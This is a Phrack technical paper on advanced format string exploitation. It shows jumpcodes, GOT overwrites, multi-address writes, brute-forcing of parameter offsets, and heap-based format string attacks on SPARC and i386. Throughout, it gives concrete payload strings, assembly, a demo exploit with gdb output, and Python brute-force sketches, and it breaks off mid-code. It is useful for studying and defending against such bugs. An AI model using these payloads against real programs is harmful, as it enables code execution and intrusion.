==Phrack Inc.==

                  0x0b, Issue 0x3b, Phile #0x07 of 0x12

|=-------------=[ Advances in format string exploitation ]=--------------=|
|=-----------------------------------------------------------------------=|
|=---------=[ by gera <gera@corest.com>, riq <riq@corest.com> ]=---------=|


    1 - Intro

    Part I 
    2 - Bruteforcing format strings

    3 - 32*32 == 32 - Using jumpcodes 
      3.1 - write code in any known address
      3.2 - the code is somewhere else
      3.3 - friendly functions
      3.4 - no weird addresses 

    4 - n times faster
      4.1 - multiple address overwrite
      4.2 - multiple parameters bruteforcing

    Part II
    5 - Exploiting heap based format strings

    6 - the SPARC stack
    
    7 - the trick
      7.1 - example 1
      7.2 - example 2
      7.3 - example 3
      7.4 - example 4

    8 - building the 4-bytes-write-anything-anywhere primitive
      8.1 - example 5

    9 - the i386 stack
      9.1 - example 6
      9.2 - example 7 - the pointer generator

    10 - conclusions
      10.1 - is it dangerous to overwrite the l0 (on the stack frame) ?
      10.2 - is it dangerous to overwrite the ebp (on the stack frame) ?
      10.3 - is this reliable ?

    The End
    11 - more greets and thanks

    12 - References

--[ 1. Intro

   Is there anything else to say about format strings after all this time?
 Probably yes, or at least we are trying... To start with, go get scut's
 excellent paper on format strings [1] and read it.

   This text deals with 2 different subjects. The first is about different
 tiny tricks that may help speed up bruteforcing when exploiting format
 string bugs, and the second is about exploiting heap based format string
 bugs.

   So fasten your seatbelts, the trip has just begun.


--[ Part I - by gera
--[ 2. Bruteforcing format strings

        "...Bruteforcing is not a very happy term, and doesn't make
        justice for a lot of exploit writers, as most of the time a
        lot of brain power is used to solve the problem in better
        ways than just brute force..."

    My greets to all those artists who inspired this phrase, especially
 ~{MaXX,dvorak,Scrippie}, scut[], lg(zip) and lorian+k.

--[ 3. 32*32 == 32 - Using jumpcodes 

    Ok, first things first...

    A format string lets you, after dealing with it, write what you want
where you want... I like to call this a write-anything-anywhere primitive,
and the trick described here can be used whenever you have a
write-anything-anywhere primitive, be it a format string, an overflow over
the "destination pointer of a strcpy()", several free()s in a row, a
ret2memcpy buffer overflow, etc.

    Scut[1], shock[2], and others[3][4] explain several methods to hook the
execution flow using a write-anything-anywhere primitive, namely changing
GOT, changing some function pointer, atexit() handlers, erm... a virtual
member of a class, etc.  When you do so, you need to know, guess or predict
2 different addresses: function pointer's address and shellcode's address,
each has 32 bits, and if you go blindly bruteforcing, you'll need to get 64
bits... well, this is not true, suppose GOT's address always starts with,
mmm... 0x0804 and that your code will be in, erm... 0x0805... ok, for linux
this may even be true, so it's not 64 bits, but 32 total, so it's just
4,294,967,296 tries...  well, no, because you may be able to provide a
cushion of 4K nops, so it goes down to 1,048,576 tries, and as GOT must be
walked on 4 bytes steps, it's just 262,144... heh, all these numbers are
just... erm... nonsense.
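
    For the record, the back-of-the-envelope numbers above can be redone
in a few lines. This is only a sketch of the arithmetic in the paragraph
(the variable names are made up for the illustration), not a claim about
any real target:

```python
# Rough search-space arithmetic from the paragraph above (illustrative).
blind_tries = 2 ** 32        # 16 unknown bits in each of the 2 addresses
nop_cushion = 4 * 1024       # a 4K nop cushion absorbs 12 bits of error
got_step = 4                 # GOT entries are walked in 4 byte steps

with_nops = blind_tries // nop_cushion
with_aligned_got = with_nops // got_step

print(blind_tries, with_nops, with_aligned_got)
```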

    Well, sometimes there are other tricks you can do, use a read primitive
to learn something from the target process, or turn a write primitive into
a read primitive, or use more nops, or target stack or just hardcode some
addresses and go happy with it...

    But, there is something else you can do, as you are not limited to
writing only 4 bytes, you can write more than the address to the shellcode,
you can also write the shellcode!

----[ 3.1. write code in any known address

    Even with a single format string bug you can not only write more than
4 bytes, but you can also write them to different places in memory, so you
can choose any address known to be writable and executable, let's say,
0x8051234 (for some target program running on some linux), write some code
there, and change the function pointer (GOT, atexit()'s functions, etc) to
point to it:


               GOT[read]:     0x8051234     ; of course using read is just
                                            ; an example

               0x8051234:     shellcode

    What's the difference? Well... shellcode's address is now known, it's
always 0x8051234, hence you only have to bruteforce function pointer's
address, cutting down the number of bits to 15 in the worst case.

    Ok, right, you got me... you cannot write a 200 bytes shellcode using
this technique with a format string (or can you?), maybe you can write a
30 bytes shellcode, but maybe you only have a few bytes... so, we need a
really small jumpcode for this to work.

----[ 3.2. the code is somewhere else

    I'm pretty sure you'll be able to put the code somewhere in target's
memory, in stack or in heap, or somewhere else (!?). If this is the case,
we need our jumpcode to locate the shellcode and jump there, which could
be really easy, or a little more tricky.

    If the shellcode is somewhere in stack (in the same format string
perhaps?) and if you can, more or less, know how far from the SP it will be
when the jumpcode is executed, you can jump relative to the SP with just 8
or 5 bytes:


              GOT[read]:      0x8051234

              0x8051234:      add $0x200, %esp   ; delta from SP to code
                              jmp *%esp          ; just use esp if you can

              esp+0x200:      nops...            ; just in case delta is
                                                 ; not really constant
                              real shellcode     ; this is not written using
                                                 ; the format string

    Is the code in heap?, but you don't have the slightest idea where it
is? Just follow Kato (this version is 18 bytes, Kato's version is a little
longer, but only made of letters, he didn't use a format string though):

              GOT[read]:      0x8051234

              0x8051234:      cld
                              mov $0x4f54414a,%eax   ; so it doesn't find
                              inc %eax               ; itself (tx juliano)
                              mov $0x804fff0, %edi   ; start searching low
                                                     ; in memory
                              repne scasl
                              jcxz .-2               ; keep searching!
                              jmp *%edi              ; upper case letters
                                                     ; are ok opcodes.

              somewhere
                in heap:      'KATO'            ; if you know the alignment
                              'KKATO'           ; one is enough, otherwise
                              'KKATO'           ; make some be found
                              'KKATO'
                              real shellcode
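
    To see why the jumpcode loads 0x4f54414a and increments it, and why
the 'KKATO' copies cover any alignment, here is a small model of the
search. It is a sketch only: find_marker() and hit_offsets() are made-up
helpers that imitate the dword by dword scan of 'repne scasl' over a
Python bytes object, they are not the jumpcode itself.

```python
import struct

MARKER = b"KATO"

# The jumpcode loads marker-1 and increments it, so the 4 marker bytes
# never appear inside the jumpcode itself.
loaded = 0x4f54414a
wanted = loaded + 1
assert struct.pack("<I", wanted) == MARKER

def find_marker(memory, start=0):
    """Scan dword by dword, like 'repne scasl'; return the offset just
    past the first aligned marker, or -1 if none is found."""
    for off in range(start, len(memory) - 3, 4):
        if memory[off:off + 4] == MARKER:
            return off + 4
    return -1

def hit_offsets():
    """'KATO' plus three 'KKATO' copies, tried at every possible skew."""
    egg = b"KATO" + b"KKATO" * 3 + b"\x90" * 8
    return [find_marker(b"\x00" * skew + egg) for skew in range(4)]

print(hit_offsets())
```

    Whatever the skew, one of the four copies ends up dword aligned, so
the scan always stops somewhere inside the marker area.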
                                
    Is it in stack but you don't know where? (10 bytes)

              GOT[read]:      0x8051234

              0x8051234:      mov $0x4f54414a,%ebx   ; so it doesn't find
                              inc %ebx               ; itself (tx juliano)
                              pop %eax
                              cmp %ebx, %eax
                              jnz .-3
                              jmp *%esp

              somewhere
               in stack:      'KATO'            ; you'll know the alignment
                              real shellcode

    Something else? ok, you figure your jumpcode yourself :-) But be
careful!  'KATO' may not be a good string, as it's executed and has some
side effects. :-)
    You may even use a jumpcode which copies from stack to heap if the
stack is not executable but the heap is.

----[ 3.3. friendly functions

    When changing GOT you can choose what function pointer you want to use,
some functions may be better than others for some targets. For example, if
you know that after you changed the function pointer, the buffer containing
the shellcode will be free()ed, you can just do: (2 bytes)

              GOT[free]:      0x8051234          ; using free this time

              0x8051234:      pop %eax           ; discarding real ret addr
                              ret                ; jump to free's argument    
 
    The same may happen with read() if the same buffer with the shellcode
is reused to read more from the net, or syslog() or a lot of other
functions...  Sometimes you may need a jumpcode a little more complex if
you need to skip some bytes at the beginning of the shellcode:
(7 or 10 bytes)

              GOT[syslog]:    0x8051234          ; using syslog

              0x8051234:      pop %eax           ; discarding real ret addr
                              pop %eax
                              add $0x50, %eax    ; skip some non-code bytes
                              jmp *%eax

    And if nothing else works, but you can distinguish between a crash and
a hang, you can use a jumpcode with an infinite loop that will make the
target hang: You bruteforce GOT's address until the server hangs, then you
know you have the right address for some GOT entry that works, and you can
start bruteforcing the address for the real shellcode.

              GOT[exit]:      0x8051234

              0x8051234:      jmp .              ; infinite loop
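
    The crash-or-hang loop could look roughly like this. It is a sketch
under loud assumptions: probe() is a hypothetical callback that fires one
attempt at the target and returns "crash" or "hang", and the address
range is just a guess for the illustration.

```python
def find_got_entry(probe, start=0x08049000, end=0x0804a000, step=4):
    """Walk candidate GOT addresses; 'probe' is a hypothetical callback
    that fires one attempt and reports "crash" or "hang"."""
    for candidate in range(start, end, step):
        if probe(candidate) == "hang":
            return candidate      # the 'jmp .' jumpcode got executed
    return None

# Stand-in for a real target: pretends GOT[exit] lives at 0x8049094.
def fake_probe(candidate):
    return "hang" if candidate == 0x8049094 else "crash"

print(hex(find_got_entry(fake_probe)))
```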

----[ 3.4. no weird addresses 

    As I don't like choosing arbitrary addresses, like 0x8051234, what we
can do is something a little different:

              GOT[free]:      &GOT[free]+4       ; point it to next 4 bytes
                              jumpcode           ; address is &GOT[free]+4

    You don't really know GOT[free]'s address, but on every bruteforcing
step you are assuming you know it, then, you can make it point 4 bytes
ahead of it, where you can place the jumpcode, i.e. if you assume your
GOT[free] is at 0x8049094, your jumpcode will be at 0x8049098, then, you
have to write the value 0x8049098 to the address 0x8049094 and the
jumpcode to 0x8049098:

  /* fs1.c                                                   *
   * demo program to show format strings techniques          *
   * specially crafted to feed your brain by gera@corest.com */

  #include <stdio.h>
  #include <string.h>

  int main() {
    char buf[1000];

    strcpy(buf,
      "\x94\x90\x04\x08"          // GOT[free]'s address
      "\x96\x90\x04\x08"          // GOT[free]'s address + 2
      "\x98\x90\x04\x08"          // jumpcode address (2 byte for the demo)
      "%.37004u"                  // complete to 0x9098 (0x9098-3*4)
      "%8$hn"                     // write 0x9098 to 0x8049094
      "%.30572u"                  // complete to 0x10804 (0x10804-0x9098)
      "%9$hn"                     // write 0x0804 to 0x8049096
      "%.47956u"                  // complete to 0x1c358 (0x1c358-0x10804)
      "%10$hn"                    // write 58 C3 (pop - ret) to 0x8049098
          );

    printf(buf);
    return 0;
  }

  gera@vaiolent:~/papers/gera$ make fs1
  cc     fs1.c   -o fs1

  gera@vaiolent:~/papers/gera$ gdb fs1
  
  (gdb) br main
  Breakpoint 1 at 0x8048439

  (gdb) r
  Breakpoint 1, 0x08048439 in main ()

  (gdb) n
  ...0000000000000...

  (gdb) x/x 0x8049094
  0x8049094:    0x08049098

  (gdb) x/2i 0x8049098
  0x8049098:    pop    %eax
  0x8049099:    ret    

    So, if the address of the GOT entry for free() is 0x8049094, the next
time free() is called in the program our little jumpcode will be called
instead.
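
    The three %.u lengths used in fs1.c do not need to be computed by
hand. The following sketch redoes the arithmetic; hn_paddings() is a
made-up helper, and the "less than 10" guard is an assumption added here
because %.Nu can print up to 10 digits even when N is smaller.

```python
def hn_paddings(halfwords, already_written):
    """Return the %.Nu precisions needed so that each following %hn
    stores the requested 16-bit value."""
    pads, count = [], already_written
    for value in halfwords:
        pad = (value - count) % 0x10000
        if pad < 10:              # %.Nu may print up to 10 digits anyway
            pad += 0x10000
        pads.append(pad)
        count += pad
    return pads

got_free = 0x8049094
jumpcode = 0xc358                 # bytes 58 c3 in memory: pop %eax ; ret
target = got_free + 4             # pointer value stored in GOT[free]

values = [target & 0xffff, target >> 16, jumpcode]
print(hn_paddings(values, already_written=3 * 4))
```

    On every bruteforcing step only got_free changes, so the same helper
can be called again with the next guess.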

    This last method has another advantage, it can be used not only on
format strings, where you can make every write to a different address, but
it can also be used with any write-anything-anywhere primitive, like a
"destination pointer of strcpy()" overwrite, or a ret2memcpy buffer
overflow. Or if you are as lucky [or clever] as lorian, you may even do
it with a single free() bug, as he taught me to do.

--[ 4. n times faster

----[ 4.1. multiple address overwrite

    If you can write more than 4 bytes, you can not only put the shellcode
or jumpcode where you know it is, you can also change several pointers at
the same time, speeding up things again.

    Of course this can be done, again, with any write-anything-anywhere
primitive which lets you write more than just 4 bytes, and, as we are
going to write the same values to all the pointers, there is a cheap way to
do it with format strings.

    Suppose we are using the following format string to write 0x12345678 at
the address 0x08049094:

    "\x94\x90\x04\x08"          // the address to write the first 2 bytes
    "AAAA"                      // space for 2nd %.u
    "\x96\x90\x04\x08"          // the address for the next 2 bytes
    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
    "%.22076u"                  // complete to 0x5678 (0x5678-4-4-4-6*8)
    "%hn"                       // write 0x5678 to 0x8049094
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%hn"                       // write 0x1234 to 0x8049096

    As %hn does not add characters to the output string, we can write the
same value to several locations without having to add more padding. For
example, to turn this format string into one that writes the value
0x12345678 to 5 consecutive words starting in 0x8049094 we can use:

    "\x94\x90\x04\x08"          // addresses where to write 0x5678
    "\x98\x90\x04\x08"          // 
    "\x9c\x90\x04\x08"          //
    "\xa0\x90\x04\x08"          //
    "\xa4\x90\x04\x08"          //
    "AAAA"                      // space for 2nd %.u
    "\x96\x90\x04\x08"          // addresses for 0x1234
    "\x9a\x90\x04\x08"          //
    "\x9e\x90\x04\x08"          //
    "\xa2\x90\x04\x08"          //
    "\xa6\x90\x04\x08"          //
    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
    "%.22044u"                  // complete to 0x5678: 0x5678-(5+1+5)*4-6*8
    "%hn"                       // write 0x5678 to 0x8049094
    "%hn"                       // write 0x5678 to 0x8049098
    "%hn"                       // write 0x5678 to 0x804909c
    "%hn"                       // write 0x5678 to 0x80490a0
    "%hn"                       // write 0x5678 to 0x80490a4
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%hn"                       // write 0x1234 to 0x8049096
    "%hn"                       // write 0x1234 to 0x804909a
    "%hn"                       // write 0x1234 to 0x804909e
    "%hn"                       // write 0x1234 to 0x80490a2
    "%hn"                       // write 0x1234 to 0x80490a6

    Or the equivalent using direct parameter access.

    "\x94\x90\x04\x08"          // addresses where to write 0x5678
    "\x98\x90\x04\x08"          // 
    "\x9c\x90\x04\x08"          //
    "\xa0\x90\x04\x08"          //
    "\xa4\x90\x04\x08"          //
    "\x96\x90\x04\x08"          // addresses for 0x1234
    "\x9a\x90\x04\x08"          //
    "\x9e\x90\x04\x08"          //
    "\xa2\x90\x04\x08"          //
    "\xa6\x90\x04\x08"          //
    "%.22096u"                  // complete to 0x5678 (0x5678-5*4-5*4)
    "%8$hn"                     // write 0x5678 to 0x8049094
    "%9$hn"                     // write 0x5678 to 0x8049098
    "%10$hn"                    // write 0x5678 to 0x804909c
    "%11$hn"                    // write 0x5678 to 0x80490a0
    "%12$hn"                    // write 0x5678 to 0x80490a4
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%13$hn"                    // write 0x1234 to 0x8049096
    "%14$hn"                    // write 0x1234 to 0x804909a
    "%15$hn"                    // write 0x1234 to 0x804909e
    "%16$hn"                    // write 0x1234 to 0x80490a2
    "%17$hn"                    // write 0x1234 to 0x80490a6

    In this example, the number of "function pointers" to write at the same
time was set arbitrarily to 5, but it could have been another number. The
real limit depends on the length of the string you can supply, how many
arguments you need to pop to get to the addresses if you are not using
direct parameter access, if there is a limit for direct parameter access
(on Solaris' libraries it's 30, on some Linuxes it's 400, and there may be
other variations), etc.
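
    A possible generator for the direct parameter access variant, for
any number of targets, is sketched below. multi_write() and its
parameters are invented for this illustration; it assumes the addresses
sit at the very start of the string and that 'first_arg' is the argument
number of the first one (8 in the listing above). It does not guard
against very small paddings.

```python
import struct

def multi_write(addresses, value, first_arg):
    """Format string storing the 32-bit 'value' at every address, using
    two %hn per address and direct parameter access."""
    lows = [struct.pack("<I", a) for a in addresses]
    highs = [struct.pack("<I", a + 2) for a in addresses]
    head = b"".join(lows + highs)
    n = len(addresses)

    lo, hi = value & 0xffff, value >> 16
    pad_lo = (lo - len(head)) % 0x10000    # addresses already printed
    pad_hi = (hi - lo) % 0x10000

    fmt = "%%.%du" % pad_lo
    fmt += "".join("%%%d$hn" % (first_arg + i) for i in range(n))
    fmt += "%%.%du" % pad_hi
    fmt += "".join("%%%d$hn" % (first_arg + n + i) for i in range(n))
    return head + fmt.encode("ascii")

targets = [0x8049094 + 4 * i for i in range(5)]
fs = multi_write(targets, 0x12345678, first_arg=8)
print(fs[40:].decode("ascii"))
```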

    If you are going to combine a jumpcode with multiple address overwrite,
you need to keep in mind that the jumpcode will not be just 4 bytes after
the function pointer, but some more, depending on how many addresses you'll
overwrite at once.

----[ 4.2. multiple parameter bruteforcing

    Sometimes you don't know how many parameters you have to pop, or how
many to skip with direct parameter access, and you need to try until you
hit the right number. Sometimes it's possible to do it in a more
intelligent way, especially when it's not a blind format string (did I say
it already? go read scut's paper [1]!). But anyway, there may be cases
when you don't know how many parameters to skip, and have to find it out
trying, as in the next pythonish example:

    pops = 8
    worked = 0
    while (not worked):
      fstring  = "\x94\x90\x04\x08"        # GOT[free]'s address
      fstring += "\x96\x90\x04\x08"        # 
      fstring += "\x98\x90\x04\x08"        # jumpcode address
      fstring += "%.37004u"                # complete to 0x9098
      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
      fstring += "%.30572u"                # complete to 0x10804
      fstring += "%%%d$hn" % (pops+1)      # write 0x0804 to 0x8049096
      fstring += "%.47956u"                # complete to 0x1c358
      fstring += "%%%d$hn" % (pops+2)      # write (pop - ret) to 0x8049098
      worked = try_with(fstring)
      pops += 1

    In this example, the variable 'pops' is incremented while trying to
hit the right number for direct parameter access. If we repeat the target
addresses, we can build a format string which lets us increment 'pops'
faster. For example, repeating each address 5 times we get a faster
bruteforcing:

    pops = 8
    worked = 0
    while (not worked):
      fstring  = "\x94\x90\x04\x08" * 5    # GOT[free]'s address
      fstring += "\x96\x90\x04\x08" * 5    # repeat address 5 times
      fstring += "\x98\x90\x04\x08" * 5    # jumpcode address
      fstring += "%.36956u"                # complete to 0x9098 (0x9098-15*4)
      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
      fstring += "%.30572u"                # complete to 0x10804
      fstring += "%%%d$hn" % (pops+5)      # write 0x0804 to 0x8049096
      fstring += "%.47956u"                # complete to 0x1c358
      fstring += "%%%d$hn" % (pops+10)     # write (pop - ret) to 0x8049098
      worked = try_with(fstring)
      pops += 5

    Hitting any of the 5 copies will be ok, the more copies you can put
the better.
    
    This is a simple idea, just repeat the addresses. If it's confusing,
grab pen and paper and make some drawings, first draw a stack with the
format string in it, and some random number of arguments on top of it, and
then start doing the bruteforcing manually... it'll be fun! I guarantee
it! :-)
    
    It may look stupid but may help you some day, you never know... and of
course the same could be done without direct parameter access, but it's a
little more complicated as you have to recalculate the length for %.u
format specifiers on every try.
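
    If pen and paper are not at hand, the same drawing can be done with
a small simulation. This is a sketch with made-up names: the argument
area is modeled as a list of words, with an unknown number of junk
arguments followed by each address repeated COPIES times, one group right
after the other, so group k starts COPIES*k arguments after the first.

```python
ADDRS = [0x8049094, 0x8049096, 0x8049098]
COPIES = 5

def stack_words(junk_args):
    """Argument words as printf would see them: 'junk_args' unknown
    words, then each target address repeated COPIES times."""
    words = [0x41414141] * junk_args
    for addr in ADDRS:
        words += [addr] * COPIES
    return words

def tries_needed(junk_args, first_guess=8):
    """Number of attempts until all three %N$hn land on the right
    addresses, stepping 'pops' by COPIES; None if it never happens."""
    words = stack_words(junk_args)
    pops, tries = first_guess, 0
    while pops + 2 * COPIES <= len(words):
        tries += 1
        picked = [pops, pops + COPIES, pops + 2 * COPIES]
        if [words[p - 1] for p in picked] == ADDRS:   # %N$ is 1-based
            return tries
        pops += COPIES
    return None

print([tries_needed(junk) for junk in (7, 8, 20, 59)])
```

    With one copy per address the same search would need one try per
argument; here every try covers COPIES candidate positions at once.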

--[ unnamed and unlisted section

    Through this text my only point was: a format string is more than a
mere 4-bytes-write-anything-anywhere primitive, it's almost a full
write-anything-anywhere primitive, which gives you more possibilities.

    So far so good, the rest is up to you...


--[ Part II - by riq
--[ 5. Exploiting heap based format strings

  Usually the format string lies on the stack. But there are cases where
it is stored on the heap, and you CAN'T see it.

  Here I present a way to deal with these format strings in a generic way
within SPARC (and big-endian machines), and at the end we'll show you how
to do the same for little-endian machines.

--[ 6. The SPARC stack

  In the stack you will find stack frames. These stack frames have local 
variables, registers, pointers to previous stack frames, return addresses,
etc.

  Since with format strings we can see the stack, we are going to study
it more carefully.

  The stack frames in SPARC look more or less like the following:


          frame 0              frame 1               frame 2
         [  l0   ]     +----> [  l0   ]      +----> [  l0   ]
         [  l1   ]     |      [  l1   ]      |      [  l1   ]
            ...        |         ...         |         ...   
         [  l7   ]     |      [  l7   ]      |      [  l7   ]
         [  i0   ]     |      [  i0   ]      |      [  i0   ]
         [  i1   ]     |      [  i1   ]      |      [  i1   ]
            ...        |         ...         |         ...   
         [  i5   ]     |      [  i5   ]      |      [  i5   ]
         [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
         [  i7   ]            [  i7   ]             [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]

  And so on...

  The saved fp is a pointer to the caller's stack frame. As you may
guess, 'fp' means frame pointer.

  The temp_N are local variables that are saved in the stack. The frame 1
starts where the frame 0's local variables end, and the frame 2 starts,
where the frame 1's local variables end, and so on.

  All these frames are stored in the stack. So we can see all of these
stack frames with our format strings.


--[ 7. the trick

  The trick lies in the fact that every stack frame has a pointer to the
previous stack frame. Furthermore, the more pointers to the stack we have,
the better.

  Why ? Because if we have a pointer to our own stack, we can overwrite the
address that it points to with any value.


--[ 7.1. example 1

 Suppose that we want to put the value 0x1234 in frame 1's l0. What we will
try to do is to build a format string, whose length is 0x1234, by the time
we've reached stack frame 0's fp with a %n.

  Supposing that the first argument that we see is the frame 0's l0
register, we should have a format string like the following (in python):

  '%8x' * 8 +     # pop the 8 registers 'l'
  '%8x' * 5 +     # pop the first 5 'i' registers
  '%4640d'  +     # modify the length of my string (4640 is 0x1220) and...
  '%n'            # I write where fp is pointing (which is frame 1's l0)


  So, after the format string has been executed, our stack should look like
this:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x00001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]
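
  The widths in the listing above are round figures: taken literally,
13 * 8 + 4640 gives 4744 (0x1288) characters. A sketch of how the exact
width for 0x1234 could be computed follows. It assumes, as the text does,
that the first argument is frame 0's l0, and that every '%8x' prints
exactly 8 characters. SLOTS, arg_index() and example1() are names
invented for the illustration.

```python
# Argument order assumed from the text: the first argument printf sees
# is frame 0's l0, followed by the rest of the register save area.
SLOTS = (["l%d" % i for i in range(8)] +
         ["i%d" % i for i in range(6)] + ["fp", "i7"])

def arg_index(slot):
    """1-based printf argument number of a frame 0 slot."""
    return SLOTS.index(slot) + 1

def example1(value, pops=13, pop_width=8):
    """'%8x' * pops, then one padded %d, then %n through the next
    argument. Returns the format string and the argument %n uses."""
    pad = value - pops * pop_width     # chars still missing for 'value'
    fmt = "%8x" * pops + "%%%dd" % pad + "%n"
    return fmt, pops + 2               # %d eats one argument before %n

fmt, n_arg = example1(0x1234)
print(fmt[-8:], n_arg, arg_index("fp"))
```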


--[ 7.2. example 2

  If we decided on a bigger number, like 0x20001234, we should find 2
pointers that point to the same address in the stack. It should be
something like this:

          frame 0              frame 1 
         [  l0   ]     +----> [  l0   ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]

  [ Note: We will not always find 2 pointers that point to the same
address, though it is not rare. ]

  So, our format string should look like this:

  '%8x' * 8 +     # pop the 8 registers 'l'
  '%8x' * 5 +     # pop the first 5 registers 'i'
  '%4640d'  +     # modify the length of my format string (4640 is 0x1220)
  '%n'      +     # I write where fp is pointing (which is frame 1's l0)
  '%3530d'  +     # again, I modify the length of the format string
  '%hn'           # and I write again, but only the hi part this time!

  And we would get the following:
          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]


--[ 7.3. example 3

  In the case that we only have 1 pointer, we can get the same result by
using the 'direct parameter access' in the format string, with
%argument_number$, where 'argument_number' is a number between 0 and 30
(in Solaris).

  My format string should be the following:
    '%4640d' +  # change the length
    '%15$n'  +  # I write where argument 15 is pointing (arg 15 is fp!)
    '%3530d' +  # change the length again
    '%15$hn'    # write again, but only the hi part!

  Therefore, we would arrive at the same result:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]
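
  The reason one pointer is enough on SPARC is byte order: on a
big-endian machine the 2 bytes stored by '%hn' land on the high half of
the word that '%n' just wrote. A small model of that, assuming a 4 byte
cell and nothing else (n_then_hn() is a made-up helper, and the padding
it prints is the exact one, where the listings use round figures):

```python
import struct

def n_then_hn(first_count, extra_pad, order):
    """Model '%n' followed by '%hn' through the same pointer.
    'order' is '>' for big-endian (SPARC) or '<' for little-endian."""
    cell = bytearray(4)
    cell[0:4] = struct.pack(order + "I", first_count)          # %n
    second = (first_count + extra_pad) & 0xffff
    cell[0:2] = struct.pack(order + "H", second)               # %hn
    return struct.unpack(order + "I", bytes(cell))[0]

low = 0x1234
pad = (0x2000 - low) % 0x10000     # extra chars before the %hn
print(pad, hex(n_then_hn(low, pad, ">")))
```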

--[ 7.4. example 4

  But it could well happen that I don't have 2 pointers that point to the
same address in the stack, and the first address that points to the stack
is outside the scope of the first 30 arguments. What could I then do ?

  Remember that with plain '%n', you can write very large numbers, like
0x00028000 and higher. You should also keep in mind that the binary's PLT
is usually located in very low addresses, like 0x0002????. So, with just
one pointer that points to the stack, you can get a pointer that points to
the binary's PLT.

  I don't believe a graphic is necessary in this example.


--[ 8. building the 4-bytes-write-anything-anywhere primitive

--[ 8.1. example 5

  In order to get a 4-bytes-write-anything-anywhere primitive we should
repeat what was done with the stack frame 0, and do it again for another
stack frame, like frame 1. Our result should look something like the
following:

      frame 0              frame 1               frame 2
     [  l0   ]     +----> [0x00029e8c]   +----> [0x00029e8e]
     [  l1   ]     |      [  l1   ]      |      [  l1   ]
        ...        |         ...         |         ...   
     [  l7   ]     |      [  l7   ]      |      [  l7   ]
     [  i0   ]     |      [  i0   ]      |      [  i0   ]
     [  i1   ]     |      [  i1   ]      |      [  i1   ]
        ...        |         ...         |         ...   
     [  i5   ]     |      [  i5   ]      |      [  i5   ]
     [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
     [  i7   ]            [  i7   ]      |      [  i7   ]
     [ temp 1]            [ temp 1]      |
                          [ temp 2]  ----+
                          [ temp 3]

  [Note: As long as the code we want to change is located in 0x00029e8c ]

  So, now that we have 2 pointers, one that points to 0x00029e8c and
another that points to 0x00029e8e, we have finally achieved our goal! Now,
we can exploit this situation just like any other format string
vulnerability :)

  The format string will look like this:

    '%4640d' +  # change the length
    '%15$n'  +  # with 'direct parameter access' I write the lower part
                # of frame 1's l0
    '%3530d' +  # change the length again
    '%15$hn' +  # overwrite the higher part
    '%9876d' +  # change the length
    '%18$hn' +  # And write like any format string exploit!


    '%8x' * 13+ # pop 13 arguments (from argument 15)
    '%6789d' +  # change length
    '%n'     +  # write lower part
    '%8x'    +  # pop
    '%1122d' +  # modify length
    '%hn'    +  # write higher part
    '%2211d' +  # modify length
    '%hn'       # And write, again, like any format string exploit.


  As you can see, this was done with just one format string. But this is
not always possible. If we can't build 2 pointers, what we need to do, is
to abuse the format string twice.

  First, we build a pointer that points to 0x00029e8c. Then, we overwrite
the value that 0x00029e8c points to with '%hn'.
 
  The second time we abuse the format string, we do the same as we did
before, but with a pointer to 0x00029e8e. There is no real need for
two pointers (0x00029e8c and 0x00029e8e), as writing first the lower part
with %n and then the higher part with %hn will work, but you'll have to use
the same pointer twice, only possible with direct parameter access.
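
  The whole idea (first build a pointer inside the stack, then write
through it) can be replayed on a toy memory. Everything here is a sketch
under assumptions: the layout is hypothetical (frame 0 is 17 words long,
so frame 0's fp is argument 15 and frame 1's l0 is argument 18), the
addresses and the value 0xbeef are arbitrary, and arguments are assumed
to be fetched only when they are used, which depends on the libc.

```python
import struct

class Mem:
    """Tiny big-endian memory model (SPARC-like)."""
    def __init__(self, size):
        self.b = bytearray(size)
    def w32(self, addr, v):
        self.b[addr:addr + 4] = struct.pack(">I", v & 0xffffffff)
    def w16(self, addr, v):
        self.b[addr:addr + 2] = struct.pack(">H", v & 0xffff)
    def r32(self, addr):
        return struct.unpack(">I", bytes(self.b[addr:addr + 4]))[0]
    def r16(self, addr):
        return struct.unpack(">H", bytes(self.b[addr:addr + 2]))[0]

def run(mem, args_base, ops):
    """Replay ('pad', n), ('n', arg) and ('hn', arg) steps. Arguments
    are fetched when used, which is an assumption about the libc."""
    count = 0
    for op, val in ops:
        if op == "pad":
            count += val
            continue
        ptr = mem.r32(args_base + 4 * (val - 1))
        if op == "n":
            mem.w32(ptr, count)
        else:
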